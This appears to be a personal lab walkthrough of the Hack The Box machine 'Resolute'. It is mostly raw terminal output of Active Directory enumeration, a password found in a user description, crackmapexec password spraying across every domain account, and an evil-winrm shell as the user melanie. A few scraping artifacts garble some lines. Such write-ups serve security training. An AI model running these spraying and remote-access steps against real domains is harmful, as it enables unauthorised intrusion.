Resolute

Nmap scan

Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-15 08:42 EDT
Nmap scan report for 10.10.10.169
Host is up (0.30s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE SERVICE      VERSION
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-15 12:50:59Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp  open  `gGV       Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-time: 
|   date: 2023-09-15T12:51:18
|_  start_date: 2023-09-15T12:49:30
|_clock-skew: mean: 2h27m04s, deviation: 4h02m31s, median: 7m03s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2023-09-15T05:51:19-07:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.59 seconds
                                                                                                              
┌──(kali㉿kali)-[~/HTB/resolute]

┌──(kali㉿kali)-[~/HTB/resolute]
└─$ crackmapexec smb  10.10.10.169  -u "" up ""
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
                                                                                                              
┌──(kali㉿kali)-[~/HTB/resolute]

smbclient

└─$ smbclient -L //10.10.10.169                         
Password for [WORKGROUP\kali]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.169 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Add the domain to the hosts file

127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.10.10.175    EGOTISTICAL-BANK.LOCAL
10.10.10.100    active.htb  htb
10.10.10.161    htb.local
10.10.10.192    blackfield.local
10.10.10.182    cascade.local
10.10.11.152    timelapse.htb
10.10.10.169    megabank.local

ldapsearch and we get some users

┌──(kali㉿kali)-[~/HTB/resolute]
└─$ ldapsearch -x -H ldap://10.10.10.169 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingContexts: DC=megabank,DC=local
namingContexts: CN=Configuration,DC=megabank,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=megabank,DC=local
namingContexts: DC=DomainDnsZones,DC=megabank,DC=local
namingContexts: DC=ForestDnsZones,DC=megabank,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
                                                                                                              
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ ldapsearch -x -H ldap://10.10.10.169 -b 'DC=megabank,DC=local' -s sub '(objectClass=person)' sAMAccountName | grep 'sAMAccountName:' | awk -F ': ' '{print $2}'
Guest
DefaultAccount
RESOLUTE$
MS02$
ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
gustavo
ulf
stevie
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki
                                                                                                              
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ 

Add the users to a text file called users.txt and well use kerbrute and all pretty much valid

well check if we can get any hashes. We will check recursively through the list using

while read -r user; do
    ./GetNPUsers.py megabank.LOCAL/$user -no-pass -dc-ip 10.10.10.169
done < /home/kali/HTB/resolute/users.txt

we do not get anything for the users

done < /home/kali/HTB/resolute/users.txt
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for administrator
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for Guest
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for DefaultAccount
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for RESOLUTE$
[-] User RESOLUTE$ doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for MS02$
[-] User MS02$ doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for ryan
[-] User ryan doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for marko
[-] User marko doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for sunita
[-] User sunita doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for abigail
[-] User abigail doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for marcus
[-] User marcus doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for sally
[-] User sally doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for fred
[-] User fred doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for angela
[-] User angela doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for felicia
[-] User felicia doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for gustavo
[-] User gustavo doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for ulf
[-] User ulf doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for stevie
[-] User stevie doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for claire
[-] User claire doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for paulo
[-] User paulo doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for steve
[-] User steve doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for annette
[-] User annette doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for annika
[-] User annika doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for per
[-] User per doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for claude
[-] User claude doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for melanie
[-] User melanie doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for zach
[-] User zach doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for simon
[-] User simon doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for naoki
[-] User naoki doesn't have UF_DONT_REQUIRE_PREAUTH set

tried rpcclient

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ rpcclient 10.10.10.169 -U ''
Password for [WORKGROUP\]:
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
                                                                                                                             
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ 

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py -dc-ip 10.10.10.169 -request 'megabank.local/'
Impacket v0.11.0 - Copyright 2023 Fortra

No entries found!
                                                                                                                             
┌──(kali㉿k

enum4linux

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ enum4linux -S 10.10.10.169
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Sep 15 09:12:26 2023

 =========================================( Target Information )=========================================

Target ........... 10.10.10.169
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on 10.10.10.169 )============================


[E] Can't find workgroup/domain



 ===================================( Session Check on 10.10.10.169 )===================================


[+] Server 10.10.10.169 allows sessions using username '', password ''


 ================================( Getting domain SID for 10.10.10.169 )================================

Domain Name: MEGABANK
Domain Sid: S-1-5-21-1392959593-3013219662-3596683436

[+] Host is part of a domain (not a workgroup)


 =================================( Share Enumeration on 10.10.10.169 )=================================

do_connect: Connection to 10.10.10.169 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.10.169

enum4linux complete on Fri Sep 15 09:12:46 2023

tried smb again

                                                                                                                             
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ crackmapexec smb 10.10.10.169 -u '' -p ''

SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\: 
                                                                                                                             
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ smbclient -L //10.10.10.169 -N -U%


        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.169 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
                                                                                                                             
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ smbclient -L //10.10.10.169 -N -U% --max-protocol=SMB2

tried to enumerate "Domain Sid: S-1-5-21-1392959593-3013219662-3596683436" using ridenum.py

└─$ ./ridenum.py 10.10.10.169 500 550

[*] Attempting lsaquery first...This will enumerate the base domain SID
[*] Successfully enumerated base domain SID. Printing information: 
Domain Name: MEGABANK
Domain Sid: S-1-5-21-1392959593-3013219662-3596683436
[*] Moving on to extract via RID cycling attack.. 
[*] Enumerating user accounts.. This could take a little while.
[!] Server sent NT_STATUS_ACCESS DENIED, unable to extract users.
[*] Attempting enumdomusers to enumerate users...
[!] Sorry. RIDENUM failed to successfully enumerate users. Bummers.

password policy

└─$ crackmapexec smb 10.10.10.169 --pass-pol
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [+] Dumping password info for domain: MEGABANK
SMB         10.10.10.169    445    RESOLUTE         Minimum password length: 7
SMB         10.10.10.169    445    RESOLUTE         Password history length: 24
SMB         10.10.10.169    445    RESOLUTE         Maximum password age: Not Set
SMB         10.10.10.169    445    RESOLUTE         
SMB         10.10.10.169    445    RESOLUTE         Password Complexity Flags: 000000
SMB         10.10.10.169    445    RESOLUTE             Domain Refuse Password Change: 0
SMB         10.10.10.169    445    RESOLUTE             Domain Password Store Cleartext: 0
SMB         10.10.10.169    445    RESOLUTE             Domain Password Lockout Admins: 0
SMB         10.10.10.169    445    RESOLUTE             Domain Password No Clear Change: 0
SMB         10.10.10.169    445    RESOLUTE             Domain Password No Anon Change: 0
SMB         10.10.10.169    445    RESOLUTE             Domain Password Complex: 0
SMB         10.10.10.169    445    RESOLUTE         
SMB         10.10.10.169    445    RESOLUTE         Minimum password age: 1 day 4 minutes 
SMB         10.10.10.169    445    RESOLUTE         Reset Account Lockout Counter: 30 minutes 
SMB         10.10.10.169    445    RESOLUTE         Locked Account Duration: 30 minutes 
SMB         10.10.10.169    445    RESOLUTE         Account Lockout Threshold: None
SMB         10.10.10.169    445    RESOLUTE         Forced Log off Time: Not Set
                                                                                                                             
┌──(kali㉿kali)-[~/Downloads]

custom objects via ldapsearch –ldapsearch -x -H ldap://10.10.10.182 -b ‘DC=cascade,DC=local’ -s sub | awk ‘{print $1}’ | sort | uniq -c | sort -nr

Found some ippsec information but nothing further after filtering for them using

┌──(kali㉿kali)-[~/Downloads]
└─$ ldapsearch -x -H ldap://10.10.10.169 -b 'DC=megabank,DC=local' -s sub '(objectClass=*)' sAMAccountName ipsecID ipsecDataType ipsecData:: ipsecOwnersReference ipsecName ipsecNFAReference ipsecNegotiationPolicyReference ipsecFilterReference | awk -F ': ' '
/sAMAccountName/ { username=$2 }
/ipsecID/ { ipsecid=$2 }
/ipsecDataType/ { ipsecdatatype=$2 }
/ipsecData::/ { ipsecdata=$2 }
/ipsecOwnersReference/ { ipsecownersref=$2 }
/ipsecName/ { ipsecname=$2 }
/ipsecNFAReference/ { ipsecnfaref=$2 }
/ipsecNegotiationPolicyReference/ { ipsecnegpolref=$2 }
/ipsecFilterReference/ { ipsecfilterref=$2 }
{ print username ": " ipsecid ", " ipsecdatatype ", " ipsecdata ", " ipsecownersref ", " ipsecname ", " ipsecnfaref ", " ipsecnegpolref ", " ipsecfilterref }'

: , , , , , , , 
: , , , , , , , 
: , , , , , , , 
: , , , , , , , 
: , , , , , , , 
sAMAccountName ipsecID ipsecDataType ipsecData:: sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:
sAMAccountName ipsecID ipsecDataType ipsecData:: sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:

tried rpcclient but with the following command – rpcclient -U ” -N 10.10.10.169 –> without asking for password

┌──(kali㉿kali)-[~]
└─$ rpcclient -U '' -N 10.10.10.169                                          

enumerate the users we get the same list we already have with ldapsearch

rpcclient




gt; enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]
rpcclient


gt;

we run querydisplay info and we find password under username Marko Novak

rpcclient




gt; querydispinfo
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela Name: (null) Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette Name: (null) Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika Name: (null) Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire Name: (null) Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude Name: (null) Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia Name: (null) Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null) Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo Name: (null) Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (null) Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki Name: (null) Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo Name: (null) Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per Name: (null) Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally Name: (null) Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon Name: (null) Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve Name: (null) Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie Name: (null) Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita Name: (null) Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf Name: (null) Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null) Desc: (null)
rpcclient


gt;


Going to use ldapsearch to try and see if we can enumarte this information by searching descripton - ldapsearch -x -H ldap://10.10.10.169 -b "DC=domain,DC=local" -s sub "(objectClass=user)" sAMAccountName description

We get the same information - password - Welcome123!

┌──(kali㉿kali)-[~/HTB/resolute]
└─$ ldapsearch -x -H ldap://10.10.10.169 -b "DC=megabank,DC=local" -s sub "(objectClass=user)" sAMAccountName description

# extended LDIF
#
# LDAPv3
# base <DC=megabank,DC=local> with scope subtree
# filter: (objectClass=user)
# requesting: sAMAccountName description 
#

# Guest, Users, megabank.local
dn: CN=Guest,CN=Users,DC=megabank,DC=local
description: Built-in account for guest access to the computer/domain
sAMAccountName: Guest

# DefaultAccount, Users, megabank.local
dn: CN=DefaultAccount,CN=Users,DC=megabank,DC=local
description: A user account managed by the system.
sAMAccountName: DefaultAccount

# RESOLUTE, Domain Controllers, megabank.local
dn: CN=RESOLUTE,OU=Domain Controllers,DC=megabank,DC=local
sAMAccountName: RESOLUTE$

# MS02, Computers, megabank.local
dn: CN=MS02,CN=Computers,DC=megabank,DC=local
sAMAccountName: MS02$

# Ryan Bertrand, Contractors, MegaBank Users, megabank.local
dn: CN=Ryan Bertrand,OU=Contractors,OU=MegaBank Users,DC=megabank,DC=local
sAMAccountName: ryan

# Marko Novak, Employees, MegaBank Users, megabank.local
dn: CN=Marko Novak,OU=Employees,OU=MegaBank Users,DC=megabank,DC=local
description: Account created. Password set to Welcome123!
sAMAccountName: marko

try crackmapexec but failed

                                                                                                                     
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ crackmapexec smb 10.10.10.169 -u marko  -p 'Welcome123!' --shares

SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE 
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ Welcome123!                                           

                                                                                                                     
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ crackmapexec smb 10.10.10.169 --shares -u marko -p 'Welcome123!'
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE 
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ crackmapexec winrm 10.10.10.169 --shares -u marko -p 'Welcome123!'
usage: crackmapexec [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--darrell] [--verbose]
                    {ldap,smb,mssql,rdp,ftp,winrm,ssh} ...
crackmapexec: error: unrecognized arguments: --shares
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ crackmapexec winrm 10.10.10.169  -u marko -p 'Welcome123!' 
SMB         10.10.10.169    5985   RESOLUTE         [*] Windows 10.0 Build 14393 (name:RESOLUTE) (domain:megabank.local)
HTTP        10.10.10.169    5985   RESOLUTE         [*] http://10.10.10.169:5985/wsman
WINRM       10.10.10.169    5985   RESOLUTE         [-] megabank.local\marko:Welcome123!
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ rpcclient 10.10.10.169 -U marko                                          
Password for [WORKGROUP\marko]:
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

found a typo in my hosts file i.e localx instead of local. also added resolute.megabank.local

127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.10.10.175    EGOTISTICAL-BANK.LOCAL
10.10.10.100    active.htb  htb
10.10.10.161    htb.local
10.10.10.192    blackfield.local
10.10.10.182    cascade.local
10.10.11.152    timelapse.htb
10.10.10.169    megabank.localx

127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.10.10.175    EGOTISTICAL-BANK.LOCAL
10.10.10.100    active.htb  htb
10.10.10.161    htb.local
10.10.10.192    blackfield.local
10.10.10.182    cascade.local
10.10.11.152    timelapse.htb
10.10.10.169    megabank.local  resolute.megabank.local


still no luck with smb

┌──(kali㉿kali)-[~/HTB/resolute]
└─$ crackmapexec smb 10.10.10.169 --shares -u marko -p 'Welcome123!'  
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE 
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ evil-winrm -i 10.10.10.169 -u marko -p 'Welcome123!'              
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
                                        
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
                                        
Error: Exiting with code 1

tried netsharenum via rpcclient

┌──(kali㉿kali)-[~]
└─$ rpcclient -U '' -N 10.10.10.169
rpcclient




gt; netshareenum
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient


gt; netshareenum^C


tried to use nmap - nmap -p 445 --script smb-enum-shares 10.10.10.169 -Pn - no luck

┌──(kali㉿kali)-[~]
└─$ nmap -p 445 --script smb-enum-shares 10.10.10.169 -Pn

Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-15 22:28 EDT
Stats: 0:05:52 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done

check each user against the password and we get melanie at the end

└─$ crackmapexec smb 10.10.10.169 -u users.txt -p 'Welcome123!'

SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\administrator:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\Guest:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\RESOLUTE$:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\MS02$:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\melanie:Welcome123! 

enumarate winrm with crackmaoexec and we get pawned. we then use evilwinrm. we get the flag

┌──(kali㉿kali)-[~/HTB/resolute]
└─$ crackmapexec winrm 10.10.10.169 -u melanie -p 'Welcome123!'
SMB         10.10.10.169    5985   RESOLUTE         [*] Windows 10.0 Build 14393 (name:RESOLUTE) (domain:megabank.local)
HTTP        10.10.10.169    5985   RESOLUTE         [*] http://10.10.10.169:5985/wsman
WINRM       10.10.10.169    5985   RESOLUTE         [+] megabank.local\melanie:Welcome123! (Pwn3d!)
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ evil-winrm -i 10.10.10.169 -u melanie -p 'Welcome123!'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\melanie\Documents> cd ../
*Evil-WinRM* PS C:\Users\melanie> cd Desktop
*Evil-WinRM* PS C:\Users\melanie\Desktop> ls


    Directory: C:\Users\melanie\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/15/2023   7:03 PM             34 user.txt


